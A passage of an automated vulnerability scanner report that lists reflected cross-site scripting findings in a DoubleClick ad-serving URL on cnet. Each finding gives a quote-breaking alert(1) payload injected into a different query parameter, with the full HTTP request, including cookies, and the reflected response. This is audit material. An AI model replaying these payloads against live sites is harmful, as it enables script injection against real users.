3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.
...[SNIP]...

3.176. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8d07"-alert(1)-"853a60c8716 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7/166/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.177. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76fd8"-alert(1)-"b133118e764 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
s%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q10000
...[SNIP]...

3.178. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de79b"-alert(1)-"244fdf90e7b was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNA
...[SNIP]...

3.179. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14b30"-alert(1)-"7bf3c7cc635 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3
...[SNIP]...

3.180. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc97"-alert(1)-"306082136f6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN201");
var fscU
...[SNIP]...

3.181. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce2ce"-alert(1)-"9cfe988ae87 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque"
...[SNIP]...

3.182. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1cb6"-alert(1)-"d5ee076476 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7186

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06
...[SNIP]...

3.183. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 703d6"-alert(1)-"b48e245097a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/htt
...[SNIP]...

3.184. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e695"-alert(1)-"df34e3faf88 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004
...[SNIP]...

3.185. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b99c1"-alert(1)-"37925af0b26 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
